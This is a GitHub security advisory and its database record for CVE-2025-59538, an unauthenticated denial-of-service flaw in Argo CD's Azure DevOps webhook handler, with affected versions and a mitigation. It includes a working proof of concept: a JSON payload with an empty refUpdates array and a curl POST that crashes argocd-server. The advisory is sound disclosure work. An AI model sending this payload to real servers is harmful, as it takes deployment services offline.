ghsa-gpx4-37g2-c8pv
Vulnerability from github
Summary
In the default configuration, webhook.azuredevops.username and webhook.azuredevops.password not set, Argo CD’s /api/webhook endpoint crashes the entire argocd-server process when it receives an Azure DevOps Push event whose JSON array resource.refUpdates is empty.
The slice index [0] is accessed without a length check, causing an index-out-of-range panic.
A single unauthenticated HTTP POST is enough to kill the process.
Details
go
case azuredevops.GitPushEvent:
// util/webhook/webhook.go -- line ≈147
revision = ParseRevision(payload.Resource.RefUpdates[0].Name) // panics if slice empty
change.shaAfter = ParseRevision(payload.Resource.RefUpdates[0].NewObjectID)
change.shaBefore= ParseRevision(payload.Resource.RefUpdates[0].OldObjectID)
touchedHead = payload.Resource.RefUpdates[0].Name ==
payload.Resource.Repository.DefaultBranch
If the attacker supplies "refUpdates": [], the slice has length 0.
The webhook code has no recover(), so the panic terminates the entire binary.
PoC
payload-azure-empty.json:
json
{
"eventType": "git.push",
"resource": {
"refUpdates": [],
"repository": {
"remoteUrl": "https://example.com/dummy",
"defaultBranch": "refs/heads/master"
}
}
}
curl call:
shell
curl -k -X POST https://argocd.example.com/api/webhook \
-H 'X-Vss-ActivityId: 11111111-1111-1111-1111-111111111111' \
-H 'Content-Type: application/json' \
--data-binary @payload-azure-empty.json
Observed crash:
``` panic: runtime error: index out of range [0] with length 0
goroutine 205 [running]: github.com/argoproj/argo-cd/v3/util/webhook.affectedRevisionInfo webhook.go:147 +0x1ea5 ... ```
Mitigation
If you use Azure DevOps and need to handle webhook events, configure a webhook secret to ensure only trusted parties can invoke the webhook handler.
If you do not use Azure DevOps, you can set the webhook secrets to long, random values to effectively disable webhook handling for Azure DevOps payloads.
diff
apiVersion: v1
kind: Secret
metadata:
name: argocd-secret
type: Opaque
data:
+ webhook.azuredevops.username: <your base64-encoded secret here>
+ webhook.azuredevops.password: <your base64-encoded secret here>
For more information
- Open an issue in the Argo CD issue tracker or discussions
- Join us on Slack in channel #argo-cd
Credits
Discovered by Jakub Ciolek at AlphaSense.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.14.19"
},
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-cd/v2"
},
"ranges": [
{
"events": [
{
"introduced": "2.9.0-rc1"
},
{
"fixed": "2.14.20"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-cd/v3"
},
"ranges": [
{
"events": [
{
"introduced": "3.2.0-rc1"
},
{
"fixed": "3.2.0-rc2"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"3.2.0-rc1"
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.1.7"
},
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-cd/v3"
},
"ranges": [
{
"events": [
{
"introduced": "3.1.0-rc1"
},
{
"fixed": "3.1.8"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.0.18"
},
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-cd/v3"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0-rc1"
},
{
"fixed": "3.0.19"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-59538"
],
"database_specific": {
"cwe_ids": [
"CWE-248",
"CWE-703"
],
"github_reviewed": true,
"github_reviewed_at": "2025-09-30T18:32:31Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\n\nIn the default configuration, `webhook.azuredevops.username` and `webhook.azuredevops.password` not set, Argo CD\u2019s /api/webhook endpoint crashes the entire argocd-server process when it receives an Azure DevOps Push event whose JSON array resource.refUpdates is empty.\n\nThe slice index [0] is accessed without a length check, causing an index-out-of-range panic.\n\nA single unauthenticated HTTP POST is enough to kill the process.\n\n### Details\n\n```go\ncase azuredevops.GitPushEvent:\n // util/webhook/webhook.go -- line \u2248147\n revision = ParseRevision(payload.Resource.RefUpdates[0].Name) // panics if slice empty\n change.shaAfter = ParseRevision(payload.Resource.RefUpdates[0].NewObjectID)\n change.shaBefore= ParseRevision(payload.Resource.RefUpdates[0].OldObjectID)\n touchedHead = payload.Resource.RefUpdates[0].Name ==\n payload.Resource.Repository.DefaultBranch\n```\n\nIf the attacker supplies \"refUpdates\": [], the slice has length 0.\n\nThe webhook code has no recover(), so the panic terminates the entire binary.\n\n### PoC\n\npayload-azure-empty.json:\n```json\n{\n \"eventType\": \"git.push\",\n \"resource\": {\n \"refUpdates\": [],\n \"repository\": {\n \"remoteUrl\": \"https://example.com/dummy\",\n \"defaultBranch\": \"refs/heads/master\"\n }\n }\n}\n```\n\ncurl call:\n\n```shell\ncurl -k -X POST https://argocd.example.com/api/webhook \\\n -H \u0027X-Vss-ActivityId: 11111111-1111-1111-1111-111111111111\u0027 \\\n -H \u0027Content-Type: application/json\u0027 \\\n --data-binary @payload-azure-empty.json\n```\n\nObserved crash:\n\n```\npanic: runtime error: index out of range [0] with length 0\n\ngoroutine 205 [running]:\ngithub.com/argoproj/argo-cd/v3/util/webhook.affectedRevisionInfo\n webhook.go:147 +0x1ea5\n...\n```\n\n### Mitigation\n\nIf you use Azure DevOps and need to handle webhook events, configure a webhook secret to ensure only trusted parties can invoke the webhook handler.\n\nIf you do not use Azure DevOps, you can set the webhook secrets to long, random values to effectively disable webhook handling for Azure DevOps payloads.\n\n```diff\napiVersion: v1\nkind: Secret\nmetadata:\n name: argocd-secret\ntype: Opaque\ndata:\n+ webhook.azuredevops.username: \u003cyour base64-encoded secret here\u003e\n+ webhook.azuredevops.password: \u003cyour base64-encoded secret here\u003e\n```\n\n### For more information\n\n* Open an issue in [the Argo CD issue tracker](https://github.com/argoproj/argo-cd/issues) or [discussions](https://github.com/argoproj/argo-cd/discussions)\n* Join us on [Slack](https://argoproj.github.io/community/join-slack) in channel #argo-cd\n\n### Credits\n\nDiscovered by Jakub Ciolek at AlphaSense.",
"id": "GHSA-gpx4-37g2-c8pv",
"modified": "2025-09-30T18:32:31Z",
"published": "2025-09-30T18:32:31Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-gpx4-37g2-c8pv"
},
{
"type": "WEB",
"url": "https://github.com/argoproj/argo-cd/commit/1a023f1ca7fe4ec942b4b6696804988d5a632baf"
},
{
"type": "PACKAGE",
"url": "https://github.com/argoproj/argo-cd"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Argo CD Unauthenticated Remote DoS via malformed Azure DevOps git.push webhook"
}
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.